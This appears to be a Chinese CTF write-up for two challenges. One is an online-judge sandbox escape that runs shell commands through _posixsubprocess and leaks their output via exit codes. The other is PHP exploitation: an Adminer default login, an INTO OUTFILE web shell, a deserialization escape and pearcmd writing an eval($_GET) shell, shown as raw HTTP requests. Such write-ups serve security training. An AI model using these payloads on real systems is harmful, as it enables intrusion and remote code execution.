# ezoj:
是一个判题的系统
/source 源码:
import os | |
import subprocess | |
import uuid | |
import json | |
from flask import Flask, request, jsonify, send_file | |
from pathlib import Path | |
app = Flask(__name__) | |
SUBMISSIONS_PATH = Path("./submissions") | |
PROBLEMS_PATH = Path("./problems") | |
SUBMISSIONS_PATH.mkdir(parents=True, exist_ok=True) | |
CODE_TEMPLATE = """ | |
import sys | |
import math | |
import collections | |
import queue | |
import heapq | |
import bisect | |
def audit_checker(event,args): | |
if not event in ["import","time.sleep","builtins.input","builtins.input/result"]: | |
raise RuntimeError | |
sys.addaudithook(audit_checker) | |
""" | |
class OJTimeLimitExceed(Exception): | |
pass | |
class OJRuntimeError(Exception): | |
pass | |
@app.route("/") | |
def index(): | |
return send_file("static/index.html") | |
@app.route("/source") | |
def source(): | |
return send_file("server.py") | |
@app.route("/api/problems") | |
def list_problems(): | |
problems_dir = PROBLEMS_PATH | |
problems = [] | |
for problem in problems_dir.iterdir(): | |
problem_config_file = problem / "problem.json" | |
if not problem_config_file.exists(): | |
continue | |
problem_config = json.load(problem_config_file.open("r")) | |
problem = { | |
"problem_id": problem.name, | |
"name": problem_config["name"], | |
"description": problem_config["description"], | |
} | |
problems.append(problem) | |
problems = sorted(problems, key=lambda x: x["problem_id"]) | |
problems = {"problems": problems} | |
return jsonify(problems), 200 | |
@app.route("/api/submit", methods=["POST"]) | |
def submit_code(): | |
try: | |
data = request.get_json() | |
code = data.get("code") | |
problem_id = data.get("problem_id") | |
if code is None or problem_id is None: | |
return ( | |
jsonify({"status": "ER", "message": "Missing 'code' or 'problem_id'"}), | |
400, | |
) | |
problem_id = str(int(problem_id)) | |
problem_dir = PROBLEMS_PATH / problem_id | |
if not problem_dir.exists(): | |
return ( | |
jsonify( | |
{"status": "ER", "message": f"Problem ID {problem_id} not found!"} | |
), | |
404, | |
) | |
code_filename = SUBMISSIONS_PATH / f"submission_{uuid.uuid4()}.py" | |
with open(code_filename, "w") as code_file: | |
code = CODE_TEMPLATE + code | |
code_file.write(code) | |
result = judge(code_filename, problem_dir) | |
code_filename.unlink() | |
return jsonify(result) | |
except Exception as e: | |
return jsonify({"status": "ER", "message": str(e)}), 500 | |
def judge(code_filename, problem_dir): | |
test_files = sorted(problem_dir.glob("*.input")) | |
total_tests = len(test_files) | |
passed_tests = 0 | |
try: | |
for test_file in test_files: | |
input_file = test_file | |
expected_output_file = problem_dir / f"{test_file.stem}.output" | |
if not expected_output_file.exists(): | |
continue | |
case_passed = run_code(code_filename, input_file, expected_output_file) | |
if case_passed: | |
passed_tests += 1 | |
if passed_tests == total_tests: | |
return {"status": "AC", "message": f"Accepted"} | |
else: | |
return { | |
"status": "WA", | |
"message": f"Wrang Answer: pass({passed_tests}/{total_tests})", | |
} | |
except OJRuntimeError as e: | |
return {"status": "RE", "message": f"Runtime Error: ret={e.args[0]}"} | |
except OJTimeLimitExceed: | |
return {"status": "TLE", "message": "Time Limit Exceed"} | |
def run_code(code_filename, input_file, expected_output_file): | |
with open(input_file, "r") as infile, open( | |
expected_output_file, "r" | |
) as expected_output: | |
expected_output_content = expected_output.read().strip() | |
process = subprocess.Popen( | |
["python3", code_filename], | |
stdin=infile, | |
stdout=subprocess.PIPE, | |
stderr=subprocess.PIPE, | |
text=True, | |
) | |
try: | |
stdout, stderr = process.communicate(timeout=5) | |
except subprocess.TimeoutExpired: | |
process.kill() | |
raise OJTimeLimitExceed | |
if process.returncode != 0: | |
raise OJRuntimeError(process.returncode) | |
if stdout.strip() == expected_output_content: | |
return True | |
else: | |
return False | |
if __name__ == "__main__": | |
app.run(host="0.0.0.0", port=5000) |
oj 判题系统,后端用过 audithook 限制代码的行为,只允许某些特定的时间(import,time.sleep,builtins.input)执行
python 代码中,会执行我提交的代码,上文限制了代码的行为(os,subprocess 等)或者执行不允许的系统调用(如 input () 都会抛出错误)
这题不回显,不出网,利用 oj 系统的一个特性:
# OJ 系统将命令执行的输出回显为退出码,攻击者可以通过获取退出码的信息来提取子进程的输出,进一步分析和获取系统信息。
这样就可以用 fork_exec () 用于执行命令并将标准输出重定向到管道,从而能够将命令的输出回传给父进程。通过这种方式,子进程执行的命令输出就可以通过推出吗的形式返回
-
导入模块:
python复制编辑import os import time import sys
os
:用于操作系统相关的功能,如管道和文件操作。time
:用于控制程序的执行时间,这里用来确保子进程执行完成。sys
:用于处理程序的退出码。
-
动态导入
_posixsubprocess
:python 复制编辑 exec('import _posixsubprocess')
- 通过
exec
动态导入_posixsubprocess
模块,绕过了审计钩子的限制。正常情况下,import
会被审计拦截,但exec
可以用来执行任意代码,允许动态导入模块。
- 通过
-
创建管道:
python复制编辑std_pipe = os.pipe() err_pipe = os.pipe()
os.pipe()
创建一个管道,返回一对文件描述符,分别用于读取(std_pipe[0]
)和写入(std_pipe[1]
)数据。- 通过管道,我们可以将命令的输出从子进程传递给父进程。
-
执行命令:
python复制编辑_posixsubprocess.fork_exec( (b"/bin/bash", b"-c", b"ls /"), # 命令 [b"/bin/bash"], True, (), None, None, -1, -1, -1, std_pipe[1], # c2pwrite -1, -1, *(err_pipe), False, False, False, None, None, None, -1, None, False, )
_posixsubprocess.fork_exec()
用于执行指定的命令(在此示例中是ls /
)。它会创建一个新的进程,并执行该命令。- 关键参数:
(b"/bin/bash", b"-c", b"ls /")
:表示要执行的命令,这里是通过bash
执行ls /
命令。std_pipe[1]
:指定命令的标准输出会重定向到std_pipe
,即命令的输出会写入管道。err_pipe
:标准错误输出也重定向到另一个管道,但这段代码并没有使用它。
-
确保子进程执行完成:
python 复制编辑 time.sleep(0.1)
- 程序在这里暂停 0.1 秒,确保子进程执行完成并且输出被写入到管道中。因为管道是异步操作,所以我们需要稍等片刻,保证数据已经被完全写入。
-
读取管道中的输出:
python复制编辑content = os.read(std_pipe[0], 1024) content_len = len(content)
os.read(std_pipe[0], 1024)
读取管道中的内容。std_pipe[0]
是管道的读取端。1024
是读取的字节数。根据命令的输出内容大小,你可能需要调整这个值。content_len
存储管道中内容的长度。
-
根据输出位置返回字符:
python复制编辑if {loc} < content_len: sys.exit(content[{loc}]) # 退出码为读取到的字符 else: sys.exit(255) # 如果没有数据,则返回 255
{loc}
是一个占位符,表示我们要读取命令输出中的某个位置的字符。- 如果读取到的内容长度大于
{loc}
,那么返回该位置的字符作为退出码(sys.exit(content[{loc}])
)。 - 如果读取到的内容不足
{loc}
,则返回255
,表示没有更多数据。
# 提交请求部分
python复制编辑command = "ls /" # 你可以修改命令,比如 'cat /flag' 或其他
received = ""
for i in range(254):
code = CODE_TEMPLATE.format(loc=i, command=command) # 格式化代码模板
data = {"problem_id": 0, "code": code} # 请求数据
resp = requests.post(URL, json=data) # 提交请求
resp_data = resp.json()
# 确保程序返回运行时错误
assert(resp_data["status"] == "RE")
# 查找退出码位置
ret_loc = resp_data["message"].find("ret=")
ret_code = resp_data["message"][ret_loc + 4:]
if ret_code == "255": # 255 表示没有更多数据
break
# 将返回的退出码转换为字符并拼接
received += chr(int(ret_code))
print(received)
-
命令设置:
python 复制编辑 command = "ls /" # 你可以修改命令,比如 'cat /flag' 或其他
- 这里
command
设置为ls /
,你可以修改为cat /flag
或其他命令,来获取你想要的信息(比如 flag)。
- 这里
-
请求循环:
python复制编辑for i in range(254): code = CODE_TEMPLATE.format(loc=i, command=command) # 格式化代码模板 data = {"problem_id": 0, "code": code} # 请求数据 resp = requests.post(URL, json=data) # 提交请求 resp_data = resp.json()
- 通过循环从位置
i = 0
到i = 253
提交代码,loc=i
表示我们每次从命令输出中读取不同位置的字符。 data
包含要提交的代码和问题 ID,requests.post()
用来将代码提交给 OJ 系统。
- 通过循环从位置
-
处理返回的响应:
python 复制编辑 assert(resp_data["status"] == "RE")
- 确保 OJ 系统返回的是运行时错误(
RE
),意味着程序执行没有通过审计,且输出通过退出码返回。
- 确保 OJ 系统返回的是运行时错误(
-
查找退出码:
python复制编辑ret_loc = resp_data["message"].find("ret=") ret_code = resp_data["message"][ret_loc + 4:]
- 查找返回消息中的
ret=
字符串,从中提取出实际的退出码。
- 查找返回消息中的
-
停止条件:
python复制编辑if ret_code == "255": # 255 表示没有更多数据 break
- 如果返回的退出码是
255
,表示没有更多数据,结束循环。
- 如果返回的退出码是
-
拼接输出并打印:
python复制编辑received += chr(int(ret_code)) print(received)
- 将每次获取的字符拼接到
received
变量中,并打印已拼接的输出。
- 将每次获取的字符拼接到
# 打卡 ok:
# 非预期:
~泄漏,发现 adminer_481.php,登陆后修改用户密码登陆
默认用户密码登录:root;root
可以有 SQL 命令执行
可以用命令写入 web 网站里面
select "1111<?php $a='cat /Ali_t1hs_1sflag_2025';system($a);?>" into outfile "/var/www/html/shell3.php";
可以修改 $a 的值
# 预期:
(没给源码怎么进行代码审计呢)
审计代码,利用绕过 date 函数反序列化逃逸
POST /index.php?debug_buka=%5c%31%5c%32%5c%33%5c%78%5c%78%5c%78%5c%78%5c%22%5c%3b%5c%73%5c%3a%5c%34%5c%3a%5c%22%5c%74%5c%69%5c%6d%5c%65%5c%22%5c%3b%5c%73%5c%3a%5c%32%5c%3a%5c%22%5c%31%5c%32%5c%22%5c%3b%5c%73%5c%3a%5c%31%5c%30%5c%3a%5c%22%5c%62%5c%61%5c%63%5c%6b%5c%67%5c%72%5c%6f%5c%75%5c%6e%5c%64%5c%22%5c%3b%5c%73%5c%3a%5c%34%5c%33%5c%3a%5c%22%5c%2e%5c%2e%5c%2f%5c%2e%5c%2e%5c%2f%5c%2e%5c%2e%5c%2f%5c%2e%5c%2e%5c%2f%5c%2e%5c%2e%5c%2f%5c%2e%5c%2e%5c%2f%5c%75%5c%73%5c%72%5c%2f%5c%6c%5c%6f%5c%63%5c%61%5c%6c%5c%2f%5c%6c%5c%69%5c%62%5c%2f%5c%70%5c%68%5c%70%5c%2f%5c%70%5c%65%5c%61%5c%72%5c%63%5c%6d%5c%64%22%5c%3b%5c%7d HTTP/1.1
Host: 192.168.10.100:50100
Content-Length: 53
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Origin: http://192.168.10.100:50100
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=fpd8m225h699b4o6stpja3vtcc; adminer_version=4.8.1
x-forwarded-for: localhost
Connection: close
reason=%3C%3Fphp+exit%3B%2F%2F%3C%3Fphp+exit%3B%2F%2F
然后 pearcmd 即可
POST /index.php?check&+config-create+/<?=@eval($_GET[1]);?>+/var/www/html/hello.php HTTP/1.1
Host: 172.16.2.72:5898
Content-Length: 7
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Origin: http://172.16.2.72:5398
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.16.2.72:5398/index.php?check/?+config-create+/%3C?=phpinfo()?%3E+/var/www/html/hello.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=inns5m7uhe0i3d9d19dtgcmsj2; adminer_version=4.8.1
x-forwarded-for: localhost
Connection: close
check=1
这个 pearcmd 挺难写进去的